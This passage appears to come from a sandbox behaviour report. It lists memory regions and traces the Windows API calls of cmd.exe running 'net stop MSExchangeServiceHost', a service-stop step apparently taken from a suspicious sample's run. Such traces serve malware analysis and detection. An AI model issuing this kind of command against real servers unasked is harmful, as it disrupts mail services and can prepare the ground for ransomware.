"c:\\windows\\syswow64\\ntdll.dll") Region: id = 12126 start_va = 0x7ec80000 end_va = 0x7eca2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec80000" filename = "" Region: id = 12127 start_va = 0x7eca7000 end_va = 0x7eca7fff entry_point = 0x0 region_type = private name = "private_0x000000007eca7000" filename = "" Region: id = 12128 start_va = 0x7eca9000 end_va = 0x7eca9fff entry_point = 0x0 region_type = private name = "private_0x000000007eca9000" filename = "" Region: id = 12129 start_va = 0x7ecad000 end_va = 0x7ecaffff entry_point = 0x0 region_type = private name = "private_0x000000007ecad000" filename = "" Region: id = 12130 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12131 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12132 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12133 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12134 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12135 start_va = 0x4880000 end_va = 0x488ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 12136 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12137 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12138 start_va = 0x49b0000 end_va = 0x4aaffff entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 12139 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12180 start_va = 0x4550000 end_va = 0x455ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004550000" filename = "" Region: id = 12181 start_va = 0x4710000 end_va = 0x47cdfff entry_point = 0x4710000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12182 start_va = 0x47d0000 end_va = 0x480ffff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 12183 start_va = 0x4890000 end_va = 0x498ffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 12184 start_va = 0x4c00000 end_va = 0x4c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 12185 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12186 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12187 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12188 start_va = 0x7eb80000 end_va = 0x7ec7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb80000" filename = "" Region: id = 12189 start_va = 0x7ecaa000 end_va = 0x7ecacfff entry_point = 0x0 region_type = private name = "private_0x000000007ecaa000" filename = "" Region: id = 12190 start_va = 0x4560000 end_va = 0x4563fff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 12191 start_va = 0x4570000 end_va = 0x4573fff entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 12192 start_va = 0x4c10000 end_va = 0x4f46fff entry_point = 0x4c10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 740 os_tid = 0xc74 [0140.538] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0140.538] __set_app_type (_Type=0x1) [0140.538] __p__fmode () returned 0x77ac4d6c [0140.538] __p__commode () returned 0x77ac5b1c [0140.539] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0140.539] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0140.539] GetCurrentThreadId () returned 0xc74 [0140.539] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc74) returned 0x84 [0140.539] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0140.539] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0140.539] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.541] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.541] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x46df968 | out: phkResult=0x46df968*=0x0) returned 0x2 [0140.541] VirtualQuery (in: lpAddress=0x46df96f, lpBuffer=0x46df920, dwLength=0x1c | out: lpBuffer=0x46df920*(BaseAddress=0x46df000, AllocationBase=0x45e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.541] VirtualQuery (in: lpAddress=0x45e0000, lpBuffer=0x46df920, dwLength=0x1c | out: lpBuffer=0x46df920*(BaseAddress=0x45e0000, AllocationBase=0x45e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.541] VirtualQuery (in: lpAddress=0x45e1000, lpBuffer=0x46df920, dwLength=0x1c | out: lpBuffer=0x46df920*(BaseAddress=0x45e1000, AllocationBase=0x45e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.541] VirtualQuery (in: lpAddress=0x45e3000, lpBuffer=0x46df920, dwLength=0x1c | out: lpBuffer=0x46df920*(BaseAddress=0x45e3000, AllocationBase=0x45e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.541] VirtualQuery (in: lpAddress=0x46e0000, lpBuffer=0x46df920, dwLength=0x1c | out: lpBuffer=0x46df920*(BaseAddress=0x46e0000, AllocationBase=0x46e0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.541] GetConsoleOutputCP () returned 0x1b5 [0140.542] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0140.542] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0140.542] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.542] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0140.542] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.542] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0140.542] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.542] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0140.542] _get_osfhandle (_FileHandle=0) returned 0x38 [0140.542] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0140.543] _get_osfhandle (_FileHandle=0) returned 0x38 [0140.543] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0140.543] GetEnvironmentStringsW () returned 0x49b7d78* [0140.543] FreeEnvironmentStringsA (penv="A") returned 1 [0140.543] GetEnvironmentStringsW () returned 0x49b7d78* [0140.543] FreeEnvironmentStringsA (penv="A") returned 1 [0140.543] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x46de8cc | out: phkResult=0x46de8cc*=0x94) returned 0x0 [0140.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x0, lpData=0x46de8d8*=0x78, lpcbData=0x46de8d4*=0x1000) returned 0x2 [0140.543] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x4, lpData=0x46de8d8*=0x1, lpcbData=0x46de8d4*=0x4) returned 0x0 [0140.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x0, lpData=0x46de8d8*=0x1, lpcbData=0x46de8d4*=0x1000) returned 0x2 [0140.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x4, lpData=0x46de8d8*=0x0, lpcbData=0x46de8d4*=0x4) returned 0x0 [0140.543] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x4, lpData=0x46de8d8*=0x40, lpcbData=0x46de8d4*=0x4) returned 0x0 [0140.543] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x4, lpData=0x46de8d8*=0x40, lpcbData=0x46de8d4*=0x4) returned 0x0 [0140.543] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x0, lpData=0x46de8d8*=0x40, lpcbData=0x46de8d4*=0x1000) returned 0x2 [0140.543] RegCloseKey (hKey=0x94) returned 0x0 [0140.543] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x46de8cc | out: phkResult=0x46de8cc*=0x94) returned 0x0 [0140.543] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x0, lpData=0x46de8d8*=0x40, lpcbData=0x46de8d4*=0x1000) returned 0x2 [0140.544] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x4, lpData=0x46de8d8*=0x1, lpcbData=0x46de8d4*=0x4) returned 0x0 [0140.544] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x0, lpData=0x46de8d8*=0x1, lpcbData=0x46de8d4*=0x1000) returned 0x2 [0140.544] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x4, lpData=0x46de8d8*=0x0, lpcbData=0x46de8d4*=0x4) returned 0x0 [0140.544] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x4, lpData=0x46de8d8*=0x9, lpcbData=0x46de8d4*=0x4) returned 0x0 [0140.544] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x4, lpData=0x46de8d8*=0x9, lpcbData=0x46de8d4*=0x4) returned 0x0 [0140.544] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x46de8d0, lpData=0x46de8d8, lpcbData=0x46de8d4*=0x1000 | out: lpType=0x46de8d0*=0x0, lpData=0x46de8d8*=0x9, lpcbData=0x46de8d4*=0x1000) returned 0x2 [0140.544] RegCloseKey (hKey=0x94) returned 0x0 [0140.544] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983d [0140.544] srand (_Seed=0x5ad2983d) [0140.544] GetCommandLineW () returned="/c net stop MSExchangeServiceHost" [0140.544] GetCommandLineW () returned="/c net stop MSExchangeServiceHost" [0140.544] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0140.544] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x49b9cd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0140.544] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0140.544] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.544] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.544] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.544] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.544] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.544] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.544] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.544] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.544] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.544] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.544] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.544] GetEnvironmentStringsW () returned 0x49b7d78* [0140.545] FreeEnvironmentStringsA (penv="A") returned 1 [0140.545] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.545] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.545] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.545] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.545] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.545] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.545] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.545] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.545] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.545] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.545] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x46df6a4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0140.545] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x46df6a4, lpFilePart=0x46df69c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x46df69c*="Desktop") returned 0x1d [0140.545] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0140.545] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x46df420 | out: lpFindFileData=0x46df420) returned 0x49b05c8 [0140.545] FindClose (in: hFindFile=0x49b05c8 | out: hFindFile=0x49b05c8) returned 1 [0140.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x46df420 | out: lpFindFileData=0x46df420) returned 0x49b05c8 [0140.545] FindClose (in: hFindFile=0x49b05c8 | out: hFindFile=0x49b05c8) returned 1 [0140.545] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0140.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x46df420 | out: lpFindFileData=0x46df420) returned 0x49b05c8 [0140.545] FindClose (in: hFindFile=0x49b05c8 | out: hFindFile=0x49b05c8) returned 1 [0140.545] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0140.546] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0140.546] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0140.546] GetEnvironmentStringsW () returned 0x49b7d78* [0140.546] FreeEnvironmentStringsA (penv="=") returned 1 [0140.546] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0140.546] GetConsoleOutputCP () returned 0x1b5 [0140.546] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0140.546] GetUserDefaultLCID () returned 0x409 [0140.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0140.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x46df7d4, cchData=128 | out: lpLCData="0") returned 2 [0140.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x46df7d4, cchData=128 | out: lpLCData="0") returned 2 [0140.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x46df7d4, cchData=128 | out: lpLCData="1") returned 2 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0140.547] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0140.547] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.547] GetConsoleTitleW (in: lpConsoleTitle=0x49ba9f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0140.548] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0140.548] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0140.548] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0140.548] _wcsicmp (_String1="net", _String2=")") returned 69 [0140.548] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0140.548] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0140.548] _wcsicmp (_String1="IF", _String2="net") returned -5 [0140.548] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0140.548] _wcsicmp (_String1="REM", _String2="net") returned 4 [0140.548] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0140.549] GetConsoleTitleW (in: lpConsoleTitle=0x46df4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.549] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0140.549] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0140.549] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0140.549] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0140.549] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0140.549] _wcsicmp (_String1="net", _String2="CD") returned 11 [0140.549] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0140.549] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0140.549] _wcsicmp (_String1="net", _String2="REN") returned -4 [0140.549] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0140.549] _wcsicmp (_String1="net", _String2="SET") returned -5 [0140.550] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0140.550] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0140.550] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0140.550] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0140.550] _wcsicmp (_String1="net", _String2="MD") returned 1 [0140.550] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0140.550] _wcsicmp (_String1="net", _String2="RD") returned -4 [0140.550] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0140.550] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0140.550] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0140.550] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0140.550] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0140.550] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0140.550] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0140.550] _wcsicmp (_String1="net", _String2="VER") returned -8 [0140.550] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0140.550] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0140.550] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0140.550] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0140.550] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0140.550] _wcsicmp (_String1="net", _String2="START") returned -5 [0140.550] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0140.550] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0140.550] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0140.550] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0140.550] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0140.550] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0140.550] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0140.550] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0140.550] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0140.550] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0140.550] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0140.550] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0140.550] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0140.550] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0140.550] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0140.550] _wcsicmp (_String1="net", _String2="CD") returned 11 [0140.550] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0140.550] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0140.550] _wcsicmp (_String1="net", _String2="REN") returned -4 [0140.550] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0140.550] _wcsicmp (_String1="net", _String2="SET") returned -5 [0140.550] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0140.550] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0140.550] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0140.550] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0140.550] _wcsicmp (_String1="net", _String2="MD") returned 1 [0140.550] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0140.550] _wcsicmp (_String1="net", _String2="RD") returned -4 [0140.550] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0140.550] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0140.550] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0140.550] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0140.550] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0140.550] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0140.550] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0140.550] _wcsicmp (_String1="net", _String2="VER") returned -8 [0140.551] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0140.551] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0140.551] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0140.551] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0140.551] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0140.551] _wcsicmp (_String1="net", _String2="START") returned -5 [0140.551] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0140.551] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0140.551] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0140.551] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0140.551] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0140.551] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0140.551] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0140.551] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0140.551] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0140.551] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0140.551] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0140.551] _wcsicmp (_String1="net", _String2="IF") returned 5 [0140.551] _wcsicmp (_String1="net", _String2="REM") returned -4 [0140.551] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0140.551] SetErrorMode (uMode=0x0) returned 0x0 [0140.551] SetErrorMode (uMode=0x1) returned 0x0 [0140.551] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x49b05d0, lpFilePart=0x46defcc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x46defcc*="Desktop") returned 0x1d [0140.551] SetErrorMode (uMode=0x0) returned 0x1 [0140.551] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0140.551] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.559] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 